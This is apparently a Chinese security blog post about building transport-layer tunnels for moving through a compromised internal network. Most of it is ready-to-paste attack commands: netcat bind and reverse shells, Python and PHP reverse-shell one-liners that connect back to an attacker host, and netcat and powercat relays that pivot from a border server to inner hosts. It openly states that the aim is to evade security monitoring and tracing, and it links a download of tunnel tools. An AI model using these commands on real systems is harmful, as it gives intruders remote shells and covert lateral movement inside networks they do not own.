内网安全 隐藏通信隧道技术——传输层.(遨游于 内网任何主机)

隐藏通信隧道技术.

隐藏通信隧道就是一种 绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上.

目录:

常用的隧道有以下:

第一步:内网连通性判断.(判断协议能不能通过防火墙.)

用 TCP 协议进行判断有没有连通性.

第二步:搭建 传输层 隧道.

传输层:TCP隧道、UDP隧道、常规端口转发.(这里我演示的是 TCP隧道.)

利用  Netcat  工具.

(1)正向连接(客户端获取服务器的shell.)

(2)反向连接.(服务器获取客户端的shell)

(3)如果目标主机上没有 Netcat,可以利用 python 反向获取 shell.

(4)目标主机上没有 Netcat,可以 PHP 反向获取 shell.

(5)内网代理:

利用  Powercat  工具.

(1)正向连接.

(2)反向连接.

(3)利用 Powercat 进行转发(边界服务器为跳板,跳到内网别的主机上.) 


当我们内网收集完信息完,就有进行下一步判断 然后做隧道通信.

(1)进出口流量是否连通的判断,是否出得去,进得来.

(2)在非受信任的网络中实现安全的数据传输.

(3)使用隐蔽的手段逃避安全监测措施和溯源追踪.


常用的隧道有以下:

网络层:IPv6隧道、ICMP隧道、GRE隧道.

传输层:TCP隧道、UDP隧道、常规端口转发.

应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道.


工具下载:

隧道工具  链接:https://pan.baidu.com/s/1tRNwmhOPyj5kwNgKCD6aCA 
                 提取码:tian 


免责声明:

严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。


第一步:内网连通性判断.(判断协议能不能通过防火墙.

TCP 协议进行判断有没有连通性.

nc -zv IP 端口号


第二步:搭建 传输层 隧道.

传输层:TCP隧道、UDP隧道、常规端口转发.(这里我演示的是 TCP隧道.)

利用  Netcat  工具.

(1)正向连接(客户端获取服务器的shell.)

外网 攻击机.(IP:192.168.1.103)

nc 【目标的IP地址】 【端口号】  


边界服务器 执行.(IP:192.168.1.105)

nc -lvp 4444 -e /bin/sh                           //linux(4444是端口)
nc -lvp 4444 -e C:\WINDOWS\system32\cmd.exe      //windows(4444是端口)


隧道 搭建完成.( kali IP:192.168.1.103)


(2)反向连接.(服务器获取客户端的shell)

外网 攻击机.(IP:192.168.1.103)

nc -lvp 【端口号】         


边界服务器 执行.(IP:192.168.1.105)

nc 【外网的IP地址】 【端口号】 -e C:\WINDOWS\system32\cmd.exe       


隧道 搭建完成.( kali IP:192.168.1.103)


(3)如果目标主机上没有 Netcat,可以利用 python 反向获取 shell.

外网 攻击机.(IP:192.168.1.103)

Nc -lvp 2222            //监听2222端口.



边界服务器 执行.(IP:192.168.1.104 和 1.1.1.18)( 记得改目标IP地址 和 端口号)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.103",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


隧道 搭建完成.( kali IP:192.168.1.103)


(4)目标主机上没有 Netcat,可以 PHP 反向获取 shell.

外网 攻击机.(IP:192.168.1.103)

Nc -lvp 2222            //监听2222端口.


边界服务器 执行.(IP:192.168.1.104 和 1.1.1.18)( 记得改目标IP地址 和 端口号)

php -r '$sock=fsockopen("192.168.1.103",2222);exec("/bin/sh -i <&3 >&3 2>&3");'


隧道 搭建完成.( kali IP:192.168.1.103)


(5)内网代理:

外网 攻击机.(IP:192.168.1.104)

nc -lvp 3333 


边界服务器 执行.(IP:192.168.1.106 和 192.168.1.18 )

nc -v 【外网的IP地址】 3333 -c “nc -v 【内网的IP地址】 3333”


内网主机 执行.(IP:1.1.1.22)( 记得改目标IP地址 和 端口号)

nc -lvp 3333 -e /bin/sh


内网代理隧道 搭建完成.( kali IP:192.168.1.104)


利用  Powercat  工具.

(1)正向连接.

边界服务器 执行.(IP:192.168.1.106) 

powercat -l  -p 8080 -e /bin/sh             //linux(8080是端口)

powercat -l  -p 8080 -e C:\WINDOWS\system32\cmd.exe      //windows(8080是端口)


外网 攻击机.(IP:192.168.1.107)

nc (边界服务器的IP地址) 8080 -vv 


正向连接隧道 搭建完成.( kali IP:192.168.1.107)


(2)反向连接.

外网 攻击机.(IP:192.168.1.107)

nc -l -p 8080 -vv 


边界服务器 执行.(IP:192.168.1.106) 

powercat -c (外网的 IP 地址) -p 8080 -v -e /bin/sh         //linux(8080是端口)

powercat -c(外网的 IP 地址) -p 8080 -v -e C:\WINDOWS\system32\cmd.exe      //windows(8080是端口)


反向连接隧道 搭建完成.( kali IP:192.168.1.107)


(3)利用 Powercat 进行转发(边界服务器为跳板,跳到内网别的主机上.) 

内网主机 执行.(IP:1.1.1.33)

powercat -l -v -p 9999 -e /bin/sh


边界服务器 执行.(IP:192.168.1.106)

powercat -l -v -p 8000 -r tcp:(内网的 IP 地址):9999


外网 攻击机.(kali:192.168.1.107)

nc (边界服务器 IP 地址) 8000 -vv  


利用 Powercat 进行转发 隧道搭建完成.( kali IP:192.168.1.107)


   

  

  • 46
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 31
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 31
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半个西瓜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值